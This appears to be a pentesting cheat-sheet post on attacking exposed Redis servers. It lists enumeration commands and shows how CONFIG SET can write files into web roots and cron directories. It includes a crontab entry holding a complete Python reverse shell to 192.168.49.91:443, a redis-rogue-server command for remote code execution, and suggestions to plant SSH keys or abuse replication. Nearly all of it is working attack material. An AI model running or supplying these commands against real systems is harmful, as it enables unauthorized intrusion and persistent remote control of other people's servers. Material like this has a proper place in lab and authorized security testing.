Enumeration
Mandatory
- Try to connect:
telnet $target 6379 // or: redis-cli -h $target
...
info
CONFIG GET *
system.exec "id" - Try to check if you can determine the existence of directories.
config set dir /var/www/htdocs
-ERR Changing directory: No such file or directory
config set dir /etc
+OK - Try to write.
- General commands:
config set dir /var/www/html
+OK
config set dbfilename t.txt
+OK
set test "hallo"
+OK
save
+OK - Possible places:
- Upload a SSH key (think also to the redis user).
- Upload a reverse shell file
- Upload a crontab file
config set dir /var/spool/cron/crontabs/
+OK
config set dbfilename root
+OK
set test "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.91\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"
+OK
save
+OK
- General commands:
- Try to use the redis-rougue-server:
- Compile the redis execution module. make will create
src/module.so. - Clone the redis-rogue-server.
- Copy the
module.sointo the server’s directory asexp.so. - Execute:
python3 redis-rogue-server.py --rhost $target --rport 6379 --lhost 192.168.49.91 --lport 443
- Compile the redis execution module. make will create
Optional
- Try to upload an SSH key
- Try to set a Redis slave to sync all data to an own system, add data and push it to the master.
Leave a Reply
You must be logged in to post a comment.